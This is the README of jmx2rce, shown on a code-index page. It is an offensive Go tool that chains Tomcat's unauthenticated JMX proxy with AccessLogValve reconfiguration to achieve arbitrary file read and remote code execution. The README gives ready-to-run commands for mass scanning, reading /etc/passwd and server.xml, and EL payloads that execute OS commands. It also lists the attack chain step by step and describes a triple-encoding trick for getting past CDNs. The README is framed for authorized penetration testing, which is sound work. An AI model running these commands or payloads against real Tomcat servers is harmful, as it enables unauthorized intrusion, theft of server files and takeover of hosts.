MCPcopy Index your code
hub / github.com/Hacktus/jmx2rce

github.com/Hacktus/jmx2rce @main

Chat with this repo
repository ↗ · DeepWiki ↗ · + Follow
29 symbols 98 edges 1 files 12 documented · 41%
What it actually does AI analysis from the code graph — generated when you open this
loading…
README

jmx2rce

This tool is for authorized security testing and educational purposes only. Only use against systems you own or have explicit written permission to test. Unauthorized access to computer systems is illegal. The author is not responsible for any misuse.

Tomcat JMX Proxy to RCE via AccessLogValve Injection

A self-contained exploitation tool that chains Apache Tomcat's unauthenticated JMX proxy endpoint with AccessLogValve reconfiguration to achieve arbitrary file read and remote code execution via Expression Language (EL) injection.

Single static Go binary. No dependencies. Works on macOS, Linux, and Windows.

Requirements

  • Go 1.20+ to build from source, or use the prebuilt binary
  • No external dependencies (standard library only)

Installation

git clone https://github.com/hacktus/jmx2rce.git
cd jmx2rce/tool
go build -o jmx2rce jmx2rce.go
./jmx2rce -h

Nuclei Template

A nuclei template is included for mass scanning. Detects unauthenticated JMX proxy access and extracts the Tomcat version.

nuclei -t tomcat-jmxproxy-unauth.yaml -l targets.txt

Single host:

nuclei -t tomcat-jmxproxy-unauth.yaml -u https://target.com

Usage

Scan for Vulnerable Hosts

Detect Tomcat instances exposing unauthenticated JMX proxy endpoints.

# Scan a single host
jmx2rce scan -H target.com

# Scan from a file with 50 threads
jmx2rce scan -f targets.txt -t 50

# Save results as JSON
jmx2rce scan -f targets.txt -o results.json

# Verbose output for debugging
jmx2rce -v scan -H target.com

Arbitrary File Read

Read arbitrary files from the server by reconfiguring the ROOT webapp's docBase.

# Read /etc/passwd
jmx2rce read -H target.com -p /etc/passwd

# Read Tomcat configuration
jmx2rce read -H target.com -p /opt/tomcat/conf/server.xml

Remote Code Execution

Full RCE chain via AccessLogValve JSP injection with EL payload.

# Default proof-of-concept payload (evaluates 7*7*7 and leaks server info)
jmx2rce rce -H target.com

# Custom EL payload
jmx2rce rce -H target.com -payload '${System.getProperty("user.name")}'

# Runtime command execution (Tomcat 9+ with EL 3.0)
jmx2rce rce -H target.com -payload '${Runtime.getRuntime().exec("id")}'

Cleanup

Restore original server configuration after testing.

jmx2rce cleanup -H target.com

# If the original docBase was different from ROOT
jmx2rce cleanup -H target.com -docbase /opt/tomcat/webapps/ROOT

Global Options

-q              Suppress banner and non-essential output
-v              Full request/response logging
-verify         Enable SSL certificate verification (disabled by default)
-scheme string  URL scheme: http or https (default: https)
-header NAME:VALUE  Add custom header to all requests (repeatable)
-no-color       Disable colored output

Attack Chain Explanation

Phase 1: Discovery (scan)

The tool sends a GET request to /manager/jmxproxy/?get=Catalina:type=Server&att=serverInfo. If the JMX proxy is exposed without authentication, Tomcat returns the server version in an OK - ... response. No authentication = full JMX read/write access to all registered MBeans.

Phase 2: Arbitrary File Read (read)

  1. Save the current docBase attribute of the ROOT WebModule MBean
  2. Set docBase to the directory containing the target file (e.g., /etc)
  3. Reload the ROOT context so Tomcat serves files from the new directory
  4. GET /{filename} to read the target file (e.g., /passwd)
  5. Restore the original docBase and reload

Phase 3: Remote Code Execution (rce)

  1. Set relaxedQueryChars on the HTTPS Connector MBean to allow {} in URLs (needed for EL syntax in some configurations)
  2. Reconfigure AccessLogValve MBean:
  3. directory = webapps/ROOT (write logs into the web root)
  4. prefix = pwned_{timestamp} (unique filename)
  5. suffix = .jsp (Tomcat will compile and execute it)
  6. pattern = %{X-Payload}i (log the value of the X-Payload request header)
  7. rotatable = false, buffered = false (immediate write)
  8. Invoke rotate() on the AccessLogValve to open the new .jsp log file
  9. Set ROOT docBase to webapps/ROOT and reload context
  10. Send a trigger request with the EL payload in the X-Payload header -- this gets written to the JSP file via the access log
  11. Access the JSP file -- Tomcat compiles and evaluates the EL expressions, returning the result

URL Encoding for CDN Traversal

The %{X-Payload}i AccessLogValve pattern token contains %, {, and } which get mangled by CDNs and reverse proxies. The tool uses triple-encoding:

Target value:     %{X-Payload}i
URL parameter:    %2525%257BX-Payload%257Di

Decoding chain:
  CDN layer:      %2525 -> %25,  %257B -> %7B,  %257D -> %7D
  Tomcat layer:   %25   -> %,    %7B   -> {,    %7D   -> }
  Final value:    %{X-Payload}i

Phase 4: Cleanup (cleanup)

Restores all modified MBean attributes to their default values: - AccessLogValve: logs/, localhost_access_log, .txt, common pattern - ROOT docBase: ROOT - Connector: clears relaxedQueryChars

Example Output

Scan

$ jmx2rce scan -H vulnerable-target.example.com -timeout 10

     _____ __  ____  ___  ____  ________
    / /  |/  |/ /\ \/ / |/ _ \/ ___/ __/
 __/ / /|_/ /> <  )  /| / , _/ /__/ _/
/___/_/  /_/_/|_/_/|_|_/_/|_|\___/___/

Tomcat JMX Proxy → RCE via AccessLogValve Injection
By: hacktus

[*] Scanning 1 host(s) with 20 threads, timeout 10s
[+] vulnerable-target.example.com - VULNERABLE - Apache Tomcat/10.1.8

[+] Found 1 vulnerable host(s):
  vulnerable-target.example.com - Apache Tomcat/10.1.8

Legal Disclaimer

This tool is provided for authorized security testing and research purposes only. You must have explicit written permission from the system owner before using this tool against any target. Unauthorized access to computer systems is illegal.

The author assumes no liability for misuse of this tool. By using jmx2rce, you agree to: - Only test systems you own or have explicit authorization to test - Follow all applicable laws and regulations - Report any vulnerabilities found through responsible disclosure

Credits

  • Author: hacktus
  • Technique: AccessLogValve JSP injection via JMX Proxy is a well-documented Tomcat attack vector. This tool automates the full chain including CDN-safe URL encoding.

Core symbols most depended-on inside this repo

info
called by 27
jmx2rce.go
errMsg
called by 23
jmx2rce.go
success
called by 20
jmx2rce.go
warn
called by 15
jmx2rce.go
verboseLog
called by 14
jmx2rce.go
Set
called by 13
jmx2rce.go
setAttribute
called by 8
jmx2rce.go
getAttribute
called by 5
jmx2rce.go

Shape

Function 15
Method 11
Struct 2
TypeAlias 1

Languages

Go100%

Modules by API surface

jmx2rce.go29 symbols

For agents

$ claude mcp add jmx2rce \
  -- python -m otcore.mcp_server <graph>

⬇ download graph artifact